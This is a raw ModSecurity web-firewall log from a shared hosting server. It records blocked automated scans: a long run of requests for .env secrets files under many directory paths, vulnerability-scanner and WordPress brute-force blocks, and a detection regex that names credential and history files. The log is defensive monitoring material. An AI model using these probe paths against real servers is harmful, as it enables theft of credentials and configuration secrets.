[Tue May 26 14:53:31.507844 2026] [security2:error] [pid 662057:tid 662284] [client 213.209.159.175:56920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/laravel/.env"] [unique_id "ahVmk_T3lMm9tGFVg9RJSQAAAWs"]
[Tue May 26 14:53:32.715673 2026] [security2:error] [pid 658374:tid 658579] [client 74.249.173.207:4800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/function/function.php"] [unique_id "ahVmlJ1Mb7_aby-E0Kcq_gAAAEs"]
[Tue May 26 14:53:32.926422 2026] [security2:error] [pid 662057:tid 662291] [client 213.209.159.175:56944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/core/.env"] [unique_id "ahVmlPT3lMm9tGFVg9RJVwAAAXI"]
[Tue May 26 14:53:33.376396 2026] [security2:error] [pid 658374:tid 658545] [client 213.209.159.175:56960] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/app/.env"] [unique_id "ahVmlZ1Mb7_aby-E0KcrCgAAACk"]
[Tue May 26 14:53:33.976759 2026] [security2:error] [pid 662057:tid 662204] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmlfT3lMm9tGFVg9RJZQAAARs"]
[Tue May 26 14:53:34.374112 2026] [security2:error] [pid 658374:tid 658586] [client 213.209.159.175:56984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/dev/.env"] [unique_id "ahVmlp1Mb7_aby-E0KcrEwAAAFI"]
[Tue May 26 14:53:35.799091 2026] [security2:error] [pid 662057:tid 662252] [client 213.209.159.175:57016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/server/.env"] [unique_id "ahVml_T3lMm9tGFVg9RJgwAAAUs"]
[Tue May 26 14:53:36.172840 2026] [security2:error] [pid 658374:tid 658614] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVml51Mb7_aby-E0KcrOwAAAG4"]
[Tue May 26 14:53:37.207836 2026] [security2:error] [pid 658374:tid 658531] [client 213.209.159.175:52510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/staging/.env"] [unique_id "ahVmmZ1Mb7_aby-E0KcrcAAAABs"]
[Tue May 26 14:53:37.652030 2026] [security2:error] [pid 658374:tid 658504] [client 213.209.159.175:52512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.215.241.212"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVmmZ1Mb7_aby-E0KcrfgAAAAA"]
[Tue May 26 14:53:37.981761 2026] [security2:error] [pid 658374:tid 658526] [client 74.249.173.207:4831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/rip.php"] [unique_id "ahVmmZ1Mb7_aby-E0KcrhgAAABY"]
[Tue May 26 14:53:38.583603 2026] [security2:error] [pid 662057:tid 662300] [client 213.209.159.175:52522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/demo/.env"] [unique_id "ahVmmvT3lMm9tGFVg9RJkwAAAXs"]
[Tue May 26 14:53:38.830654 2026] [security2:error] [pid 658374:tid 658515] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmmp1Mb7_aby-E0KcriwAAAAs"]
[Tue May 26 14:53:39.033943 2026] [security2:error] [pid 658374:tid 658561] [client 213.209.159.175:52536] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/portal/.env"] [unique_id "ahVmm51Mb7_aby-E0KcrmAAAADk"]
[Tue May 26 14:53:39.955579 2026] [security2:error] [pid 662057:tid 662314] [client 213.209.159.175:52554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/crm/.env"] [unique_id "ahVmm_T3lMm9tGFVg9RJogAAAYk"]
[Tue May 26 14:53:40.362857 2026] [security2:error] [pid 658374:tid 658513] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmm51Mb7_aby-E0KcrrQAAAAk"]
[Tue May 26 14:53:40.400364 2026] [security2:error] [pid 662057:tid 662222] [client 213.209.159.175:52566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/test/.env"] [unique_id "ahVmnPT3lMm9tGFVg9RJsAAAAS0"]
[Tue May 26 14:53:40.845983 2026] [security2:error] [pid 658374:tid 658580] [client 213.209.159.175:52572] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/config/.env"] [unique_id "ahVmnJ1Mb7_aby-E0KcrwAAAAEw"]
[Tue May 26 14:53:41.291736 2026] [security2:error] [pid 662057:tid 662207] [client 213.209.159.175:52586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/bot/.env"] [unique_id "ahVmnfT3lMm9tGFVg9RJtgAAAR4"]
[Tue May 26 14:53:41.736136 2026] [security2:error] [pid 658374:tid 658613] [client 213.209.159.175:52592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.215.241.212"] [uri "/test.php"] [unique_id "ahVmnZ1Mb7_aby-E0Kcr0AAAAG0"]
[Tue May 26 14:53:42.507398 2026] [security2:error] [pid 658374:tid 658612] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmnp1Mb7_aby-E0Kcr1AAAAGw"]
[Tue May 26 14:53:42.663132 2026] [security2:error] [pid 658374:tid 658536] [client 213.209.159.175:52610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/API/.env"] [unique_id "ahVmnp1Mb7_aby-E0Kcr4AAAACA"]
[Tue May 26 14:53:43.100709 2026] [security2:error] [pid 658374:tid 658630] [client 213.209.159.175:52616] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/main_user/.env"] [unique_id "ahVmn51Mb7_aby-E0Kcr7gAAAH4"]
[Tue May 26 14:53:43.497165 2026] [core:crit] [pid 658374:tid 658526] (13)Permission denied: [client 207.46.13.155:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:53:43.537799 2026] [security2:error] [pid 658374:tid 658558] [client 213.209.159.175:52624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/Chai/.env"] [unique_id "ahVmn51Mb7_aby-E0Kcr_wAAADY"]
[Tue May 26 14:53:43.976204 2026] [security2:error] [pid 658374:tid 658545] [client 213.209.159.175:52632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/resources/docker/rabbitmq/.env"] [unique_id "ahVmn51Mb7_aby-E0KcsEQAAACk"]
[Tue May 26 14:53:44.349662 2026] [security2:error] [pid 658374:tid 658614] [client 62.244.225.226:21838] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVmn51Mb7_aby-E0KcsEgAAAG4"]
[Tue May 26 14:53:44.901125 2026] [security2:error] [pid 662057:tid 662210] [client 213.209.159.175:52640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/test-network/.env"] [unique_id "ahVmoPT3lMm9tGFVg9RJ1gAAASE"]
[Tue May 26 14:53:45.348490 2026] [security2:error] [pid 662057:tid 662310] [client 213.209.159.175:52656] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/InstantCV/server/.env"] [unique_id "ahVmofT3lMm9tGFVg9RJ3QAAAYU"]
[Tue May 26 14:53:45.419907 2026] [security2:error] [pid 658374:tid 658556] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmoJ1Mb7_aby-E0KcsKgAAADQ"]
[Tue May 26 14:53:45.790612 2026] [security2:error] [pid 658374:tid 658541] [client 213.209.159.175:52668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/web-dist/.env"] [unique_id "ahVmoZ1Mb7_aby-E0KcsQgAAACU"]
[Tue May 26 14:53:46.231391 2026] [security2:error] [pid 662057:tid 662249] [client 213.209.159.175:52680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/env/template/.env"] [unique_id "ahVmovT3lMm9tGFVg9RJ6wAAAUg"]
[Tue May 26 14:53:46.673733 2026] [security2:error] [pid 662057:tid 662269] [client 213.209.159.175:52692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/client/src/.env"] [unique_id "ahVmovT3lMm9tGFVg9RJ8wAAAVw"]
[Tue May 26 14:53:47.115576 2026] [security2:error] [pid 662057:tid 662253] [client 213.209.159.175:40254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/08-routing/end/vue-heroes/.env"] [unique_id "ahVmo_T3lMm9tGFVg9RJ_wAAAUw"]
[Tue May 26 14:53:47.554301 2026] [security2:error] [pid 662057:tid 662284] [client 213.209.159.175:40266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/app/config/dev/.env"] [unique_id "ahVmo_T3lMm9tGFVg9RKCwAAAWs"]
[Tue May 26 14:53:47.690007 2026] [security2:error] [pid 662057:tid 662281] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmo_T3lMm9tGFVg9RKAgAAAWg"]
[Tue May 26 14:53:47.994726 2026] [security2:error] [pid 662057:tid 662306] [client 213.209.159.175:40272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/07-accessing-data/end/vue-heroes/.env"] [unique_id "ahVmo_T3lMm9tGFVg9RKEQAAAYE"]
[Tue May 26 14:53:48.022292 2026] [security2:error] [pid 662057:tid 662079] [remote 51.91.98.45:56310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmo_T3lMm9tGFVg9RKDQABShU"]
[Tue May 26 14:53:48.435381 2026] [security2:error] [pid 662057:tid 662267] [client 213.209.159.175:40288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/examples/vue-dashboard/backend/.env"] [unique_id "ahVmpPT3lMm9tGFVg9RKGQAAAVo"]
[Tue May 26 14:53:48.774226 2026] [security2:error] [pid 662057:tid 662227] [client 74.249.173.207:4839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/admin.php"] [unique_id "ahVmpPT3lMm9tGFVg9RKIQAAATI"]
[Tue May 26 14:53:48.878390 2026] [security2:error] [pid 662057:tid 662202] [client 213.209.159.175:40304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/counterwallet/.env"] [unique_id "ahVmpPT3lMm9tGFVg9RKKAAAARk"]
[Tue May 26 14:53:49.320415 2026] [security2:error] [pid 662057:tid 662199] [client 213.209.159.175:40310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/mailman/.env"] [unique_id "ahVmpfT3lMm9tGFVg9RKMAAAARY"]
[Tue May 26 14:53:49.321856 2026] [security2:error] [pid 662057:tid 662209] [client 154.161.32.97:57063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmpfT3lMm9tGFVg9RKLQAAASA"]
[Tue May 26 14:53:49.322080 2026] [security2:error] [pid 662057:tid 662209] [client 154.161.32.97:57063] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmpfT3lMm9tGFVg9RKLQAAASA"]
[Tue May 26 14:53:49.461708 2026] [security2:error] [pid 662057:tid 662304] [client 154.161.32.97:47135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmpfT3lMm9tGFVg9RKLwAAAX8"]
[Tue May 26 14:53:49.461841 2026] [security2:error] [pid 662057:tid 662304] [client 154.161.32.97:47135] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmpfT3lMm9tGFVg9RKLwAAAX8"]
